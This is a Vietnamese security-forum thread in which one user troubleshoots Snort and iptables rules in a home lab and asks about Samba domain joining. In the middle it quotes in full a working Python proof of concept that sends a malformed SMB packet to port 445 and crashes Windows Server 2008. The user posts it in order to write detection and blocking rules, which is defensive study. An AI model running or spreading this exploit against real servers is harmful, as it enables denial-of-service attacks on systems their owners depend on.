Messages posted by: phathuynh26

Bạn có thể nói rõ mục đích khi sử dụng honey pot (bạn định làm gì với snort và honeypot,...)

hoahongtim wrote:

Một câu hỏi hay nhưng chưa có trả lời

Bạn đã nghỉ tới cách cài một phần mềm chat tương tự trên di động của bạn và login và hỏi số di động của người đó chưa smilie

+ Bạn làm đơn giản với 3 máy trước xem (bỏ triển khai DHCP, DNS)
+ Bạn triển khai DNS trên máy linux hay window (cấu hình như thế nào?)

simmy wrote:

Mình nghĩ dùng BASE hay không nó không quan trọng, vì nếu không dùng nó cũng sẽ in ra terminal vì đã chọn -A console. Hoặc giả dụ không dùng -A console thì nó cũng tạo ra file alert để mình biết.
Hơn nữa, mình cũng đã dùng BASE trước đây, nhưng cũng chỉ có alert của UDP và ICMP thôi.
Với lại mình thấy CentOS và RHEL nó cũng không khác gì về việc cài đặt từ tarball cả, nên mình đang nghi là có phải bản 2.8.6 này có hạn chế gì không? Mà cậu đang xài bản mấy vậy?

Trong vài ngày chờ đợi dùng bản 2.8.5.3 (tar) đi simmy smilie

Mặc định thì khi cài đặt Snort xong thì không cần phải đụng đến các preprosessor. Theo như các bài viết trên thì simmy thử cài BASE để xem cảnh báo xem smilie

Hồi trước mình cùng bị trường hợp như vậy nhưng đợi vài tiếng (đợi cho nó nóng máy) rồi tự khắc nó sẽ báo. Mình rất tin về cái vụ "nóng máy" này smilie

Còn nếu vẫn không được, thử cài lại trên một máy ảo CentOS hoàn toàn mới xem sao. Trong quá trình cài đặt sẽ nhận ra được nhiều điều mà chỉ có bản thân của mình giải thích được mà thôi.

Trong cái rule của anh thì cái sid bị trùng kìa, chứ em cài snort, test tcp nó báo 100% luôn smilie

Em xin chân thành cảm ơn anh conmale và anh simmy. Em đã cài đặt thành công với tất cả những lời hướng dẫn trên.

Best regards smilie

simmy wrote:

phathuynh26 wrote:

Cảm ơn anh, em đã làm như anh chỉ nhưng cũng không được

Không được là install không được? Báo lỗi cài đặt không được? Hay là đã cài lại thành công với options trên nhưng vẫn không dùng được?

Mà trước đó bạn đã thử: make uninstall và make distclean chưa mà configure lại vậy?

Dạ đã cài lại thành công với options trên nhưng vẫn không dùng được?
Em chưa có make uninstall, mà mình chạy ./configure xong rồi make uninstall hả anh? để em thử smilie

Dạ nó đây ạ:
Code:

--enable-react Intercept and terminate offending HTTP accesses
--enable-flexresp Flexible Responses (v1) on hostile connection attempts
--enable-flexresp2 Flexible Responses (v2) on hostile connection attempts

simmy wrote:

phathuynh26 wrote:

Dạ đây:
Em đang dùng bản 2.8.5.3
./configure --enable-flexresp
./configure --enable-react
./configure && make && make install

Sao lại ./configure từng dòng vậy bạn? Bạn thử:

./configure --enable-flexresp --enable-react. Sau đó
make ; make install

Cảm ơn anh, em đã làm như anh chỉ nhưng cũng không được smilie

conmale wrote:

Em đưa lên trọn bộ dòng ./configure của em anh coi thử?

Dạ đây:
Em đang dùng bản 2.8.5.3
./configure --enable-flexresp
./configure --enable-react
./configure && make && make install

Trích trong Snort FAQ
Code:

5.8 Snort complains about the “react” keyword...
Rerun configure with the --enable-flexresp option and rebuild/reinstall.

Em gõ đi gõ lại mấy cái lệnh trên hoài mà vẫn không được.

conmale wrote:

Như đã trả lời bên chủ đề kia. Dùng wireshark thì đọc kỹ tài liệu tham khảo của wireshark. Nếu em xem kỹ trên Wireshark phần biểu thị hex thì sẽ thấy mỗi dòng hiển thị 16 bytes. Điều này có nghĩa từ offset 0000 đến offset 0010 là 16 bytes. Từ offset 0010 đến offset 0020 là 16 bytes nữa. Cứ theo đó mà tính. Nếu em bấm trên 1 hex hoặc select một chuỗi hex nào đó, nó sẽ hiển thị tổng số bytes được select. Song song vào đó, em có thể nhìn cột tay trái để xác định chuỗi hex đã được select thuộc offset là bao nhiêu. Từ đó cứ nhân số dòng (offset 0020 = dòng 3, offset 00a0 = dòng 10, offset 00f0 = dòng 16..... theo đúng hexadecimal system) cho 16 bytes là có kết quả "length" cần dùng (nên công thêm 2 bytes để trừ hao).

Những thứ này chẳng có sách nào chỉ dẫn cả. Mình sử dụng công cụ thì phải làm quen và tìm cách tính toán thôi em.

Theo như hình trên, em nhìn bên cột tay trái là offset thứ 6 (dòng 0050). Em đã thử test vài trường hợp như sau:
1. offset: 6 ; depth: 84 -> Snort cảnh báo.
2. offset: 7,8,9,10,11,12,13,14,15,16 ; depth:84 -> Em không hiểu sao Snort vẫn cảnh báo.
3. offset: 6 ; depth:12 đến 80 -> Snort vẫn cảnh báo? Trong khi đó, em chỉnh lại depth:10 thì snort lại không cảnh báo. Hai giá trị offset và depth có quan hệ and hay or vậy anh, em chưa hiểu nó lắm?

Theo như snort manual thì: "An offset of 5 would tell Snort to start looking for the specified pattern after the first 5 bytes of the payload."

A depth of 5 would tell Snort to only look for the specified pattern within the first 5 bytes of the payload.

Best regards!

Em cũng đã ./configure --enable-flexresp và ./configure --enable-flexresp2 luôn rồi smilie

Mặc dù em đã chạy lệnh ./configure --enable-react rồi (đã install libnet1.0.2a) mà khi em viết rule:
alert tcp any any <> 192.168.1.0/24 80 (content: "bad.htm"; msg: "Not for children!"; react: block; resp:rst_all; )
Snort đưa ra thông báo Unknown rule option: 'react' và 'resp'. Mong mọi người hướng dẫn.
Best regards!

Dạ em mừng quá nên chặn được rồi post lên luôn smilie

Em đã thêm -m length --length 98 mà sao rule không có tác dụng, em sửa lại -m length --length 0:200 thì ok, em tính từ offset 0050(dòng 6)x 16 bytes = 96 (cộng thêm 2 bytes) mà sao length nó không match?
Em trừ hao tới 200 thì rule có tác dụng.

00a0 = dòng 11 ạ? Em xin sửa lại offset = 5 và depth = 96 (dựa theo hex |00 26| hình trên)
Còn đây là iptables rule:
-A RH-Firewall-1-INPUT -p tcp -m state --state ESTABLISHED -m string --hex-string "|00 26|" --algo bm -m tcp --dport 445 -j DROP

Rule đã chặn được dựa trên những dấu hiệu cơ bản, nhưng em cần phải hạn chế việc false alert như anh nói. Cảm ơn anh conmale smilie

conmale wrote:

Đây là cách dễ nhất:

Nếu không phải tính từ hex thành bytes (tự tìm hiểu sau nhá).

Em đang tìm hiểu việc giới hạn việc tìm kiếm trên payload của một gói tin.
Theo như hình trên thì offset=30 và depth=4 phải không anh?

Sau khi trấn tỉnh lại em tạo ra iptable và snort rule như sau:
Code:

-A RH-Firewall-1-INPUT -p tcp -m state --state NEW -m string --hex-string "|00 26|" --algo bm -m length --length 144 -m tcp --dport 445 -j DROP

Code:

alert tcp $EXTERNAL_NET any -> $HOME_NET [135,139,445] (msg:"NETBIOS SMB process ID high field"; flow:to_server, established; content:"|FF|SMBr|00 00 00|"; isdataat:6,relative; content:!"|00 00|"; within:2; distance:4; classtype:attempted-dos; sid:15930;)

Anh có thể châm cho em làm sao để xác định giá trị offset và depth trong trường hợp trên? Theo hình trên thì 00 26 bắt đầu tại offset=50 và depth=2
Best regards!

Bạn google thử "tcp hardening" xem sao.
Good luck!

Với Snort rule :
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"Dos attack"; flow:to_server, established; content:"|00 26|"; classtype:attempted-dos; sid:15930 smilie

Hoạt động tốt. Nhưng em chuyển cái content như thế cho iptables thì nó không hoạt động smilie

ProcessID bình thường hiển thị như sau:

Tương tự như thế với |00 26| -> ".&"

conmale wrote:

và tại sao là length 144 và string là "\x00\x26" ? Vậy !"|00 00|" để làm chi?

Vì proccess id bình thường của việc việc share file là "00 00" em nâng lên thành 26 thì 2k8 bị dump và restart-> Em chặn bắt gói tin share smb có content mà khác giá trị mặc định.
Theo như anh nói thì : "-m length để buộc iptables tìm string match trong một khoảng offset nào đó của packet" nên em thêm length 144 (do em dùng wireshark bắt được)
Em dựa theo snort rule đã hoạt động và làm cái content giống như vậy cho iptables rule.

conmale wrote:

Tại sao là --string "\"|0000|" ?

Em đã chỉnh lại ạ:
-A RH-Firewall-1-INPUT -p tcp -m state --state ESTABLISHED -m string --string !"|00 00|" --algo bm --to 65535 -m length --length 144 -m tcp --dport 445 -j DROP

Rule em đã điều chỉnh:
-A RH-Firewall-1-INPUT -p tcp -m state --state ESTABLISHED -m string --string !"|0000|" --algo bm --to 65535 -m length --length 144 -m tcp --dport 445 -j DROP

Nhưng máy 2k8 vẫn dump smilie

Và edit port tương ứng với rule của snort. Anh nhầm port 145 ạ?

Rule của snort "established" : do các packet đã được thiết lập (2k8 đã dump) nên rule snort hoạt động.
Rule của iptables "--state NEW" : các packet chỉ bắt đầu thiết lập connection, vậy em edit lại --state ESTABLISHED: đã thiết lập connection.

Em đã cấu hình card mạng như sau:

BackTrack---------192.168.1.0/24------------LINUX--------172.16.1.0/24------------Server2k8

Cấu hình:
BackTrack
IP(vm2):192.168.1.99
DG: 192.168.1.20
DNS:192.168.1.20

LINUX
IP(vm2):192.168.1.20
IP(bridge):172.16.1.30
Hostname: ids.nhatnghe.com

Server2k8(DC)
IP(bridge): 172.16.1.40
DG: 172.16.1.30

-> Hoàn toàn không cần dùng internet (iptalbes trên LINUX đã cho chế độ ip forwarding)

Em đã dùng wireshare trên BT và thiết lập rule iptables như sau:

Code:

-A RH-Firewall-1-INPUT -p tcp -m state --state NEW -m string --string "\x00\x26" -m length --length 144 -m tcp --dport 445 --algo bm -j DROP

Nhưng khi gõ lệnh dos tại BackTrack máy 2k8 vẫn bị dump. Có cần thêm thông tin gì vào rule nữa không anh?
Cảm ơn anh đã trả lời topic.

Đây là snort rule để cảnh báo tấn công dos thông qua việc tăng proccess id khi thực hiện share trên win2k8:
Code:

alert tcp $EXTERNAL_NET any -> $HOME_NET [135,139,445] (msg:"NETBIOS Microsoft Windows SMB malformed process ID high field remote code executionattempt"
;flow:to_server,established;content:!"|0000|";classtype:attempted-dos; sid:15930;)

Đây là file để thực hiện việc gởi yêu cầu tới máy 2k8 thông qua protocol 445, máy 2k8 sẽ bị dump:
Code:

Smb-Bsod.py:
#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

"\x00\x26"# Process ID High: normal value should be "\x00\x00"
Mọi người cho em hỏi là dùng rule của iptables có thể nhận biết được content:!"|00 00|" và drop gói tin trên không?
Best regards!

luckyfun wrote:

bạn kiểm tra đã tạo xác thực giữa 2 máy chưa ( kinit - klist )
bạn join domain qua samba hay qua service nào. Nếu join thông qua samba thì cho mình xem thử file config của bạn nha ....

^.^! thân ...

Đây là file smb.conf:

Code:

workgroup = VSIC
password server = server.vsic.com
realm = VSIC.COM
security = ads
idmap uid = 16777216-33554431
idmap gid = 16777216-33554431
template shell = /sbin/nologin
winbind use default domain = false
winbind offline logon = false

Best regards!

Linux em dùng là bản CentOS. Em đã tạo Alias cho ip.

Nhưng cấu hình 1 card mạng với 2 đc ip như trên thì iptables có thể kiểm soát được các gói tin không anh?

Mô hình như sau: client---192.168.1.0---IPS---172.16.1.0---webserver

Nếu để card mạng của máy ảo vmware ở chế bridge hết thì gói tin sẽ không đi qua iptables được.

Và em đã làm như sau:
+ Máy Iptables có 2 card:
1 card bridge nối ra internet ( tạm gọi card 1 )
1 card bạn chọn vmnet2,3,4,5,6,7 ( tạm gọi card 2 )
+ Máy client:
1 card đặt cùng chế độ với card 2 máy Iptables.